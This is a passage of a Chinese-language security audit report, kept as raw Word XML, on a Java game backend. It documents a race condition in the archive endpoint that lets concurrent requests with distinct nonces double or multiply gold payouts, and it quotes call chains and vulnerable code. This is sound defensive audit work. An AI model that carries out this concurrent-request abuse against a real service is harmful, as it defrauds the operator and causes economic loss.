        <w:t xml:space="preserve">权限级别：普通注册用户，无需任何特殊权限；仅要求账户有非零 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 距今大于 0 秒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 13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受影响调用链（14 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="210"/>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ArchiveService.java.validateSlotChargingState → UserMiner.java.getIsCharged</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="211"/>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ArchiveService.java.validateSlotChargingState → UserMiner.java.getChargedExpireTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="212"/>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ArchiveService.java.validateMinerInventoryNew → UserMiner.java.getMinerLevel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="213"/>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ArchiveService.java.pollMinerFromPoolNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="214"/>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UserMiner.java.setSlotId</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="215"/>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UserMiner.java.setInStorage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="216"/>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UserMiner.java.setChargedExpireTime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="217"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.java.archive → ArchiveService.java.saveArchiveNew → RedisMiningBalanceCache.java.invalidate → RedisMiningBalanceCache.java.balanceKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="218"/>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ArchiveService.java.collectGridLevelsNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="219"/>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ArchiveService.java.collectStorageLevelsNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="220"/>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ArchiveService.java.validateSlotLayoutNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="221"/>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ArchiveService.java.validateOccupiedSlotsUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="222"/>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ArchiveService.java.ensurePoolEmptyNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ArchiveController.java.archive → ArchiveService.java.saveArchiveNew → User.java.setLastArchiveTime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audit_m058_150_archive_ctrl-path3of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_166_archive_ctrl-path4of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_231_archive_ctrl-path8of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_265_archive_ctrl-path10of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_277_archive_ctrl-path11of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_296_archive_ctrl-path12of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_337_archive_ctrl-path15of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_349_archive_ctrl-path16of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_362_archive_ctrl-path17of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_372_archive_ctrl-path18of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_381_archive_ctrl-path19of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_395_archive_ctrl-path20of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_410_archive_ctrl-path21of25.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m058_442_archive_ctrl-path23of25.md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：ArchiveService.java#saveArchiveNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_11" w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞10：存档黄金结算 TOCTOU 竞态条件——并发请求导致双倍黄金收益</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="22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：存档接口并发请求致黄金余额双重结算（TOCTOU Race Condition）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="22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src/main/java/com/gameBack/mjservice/service/ArchiveService.java:saveArchiveNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="22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22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2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：已登录普通用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="22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saveArchiveNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在事务开始时通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userRepository.findById(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无锁普通 SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（上次存档时间）和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.currentTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（算力）。黄金增量 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd = oldHashRate × seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的计算完全依赖此次读出的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</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user.setLastArchiveTime(now)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的写回位于事务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>末尾</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁定的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账户行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">。因此，在两个并发事务均完成"读取 user 行"但尚未提交之前，二者读到的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同一个旧值 T₀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，均计算出相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd = hashRate × (T_now − T₀)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务提交时序：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T1 持有账户 FOR UPDATE 锁 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance = B + goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 提交并将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新为 T_now</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T2 等待后持有账户锁，但其内存中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对象仍是事务起始时读到的旧副本（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime = T₀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）→ 再次计算相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>balance = (B + goldToAdd) + goldToAdd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">最终账户余额多出一倍 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。由于每次存档的签名 nonce 只要不重复即可通过检验，攻击者只需在每次结算时发送两个不同 nonce 的并发请求即可稳定复现，且可无限循环叠加。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="232"/>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POST /api/game/archive</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → ArchiveController.archive(userId←Token, request←@RequestBody)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → ArchiveService.saveArchiveNew(userId, request)  @Transactional</w:t>
              <w:br/>
              <w:t xml:space="preserve">          → userRepository.findById(userId)              ← 无锁普通 SELECT，读 lastArchiveTime / hashRate</w:t>
              <w:br/>
              <w:t xml:space="preserve">          → settleArchiveGoldNew(userId, user, now)      ← 使用 user 内存副本中的旧 lastArchiveTime 计算 goldToAdd</w:t>
              <w:br/>
              <w:t xml:space="preserve">              → userAccountRepository.findByUserIdForUpdate(userId) ← 锁账户行（但用户行未锁）</w:t>
              <w:br/>
              <w:t xml:space="preserve">              → account.setGoldBalance(cur + goldToAdd)  ← 写入黄金增量</w:t>
              <w:br/>
              <w:t xml:space="preserve">          → user.setLastArchiveTime(now)                 ← 事务末尾才更新 lastArchiveTime，未保护检查窗口</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">          → userRepository.save(user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="233"/>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：攻击者可通过每轮存档发送 N 个并发请求，将单次黄金结算放大 N 倍。若黄金可兑换现金或游戏道具，则构成真实经济损失；长期运行可使攻击者账户黄金余额无限膨胀。</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入口：ArchiveController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/archive")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; archive(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                  @RequestBody @Valid ArchiveSaveRequest request) { // ← userId 来自 Token（安全），request 来自客户端</w:t>
              <w:br/>
              <w:t xml:space="preserve">    archiveService.saveArchiveNew(userId, request); // ← 进入存档主逻辑</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 主逻辑：ArchiveService.java # saveArchiveNew</w:t>
              <w:br/>
              <w:t>@Transactional   // ← Spring 默认 REQUIRED + 数据库默认 READ COMMITTED 隔离</w:t>
              <w:br/>
              <w:t>public void saveArchiveNew(Long userId, ArchiveSaveRequest request) {</w:t>
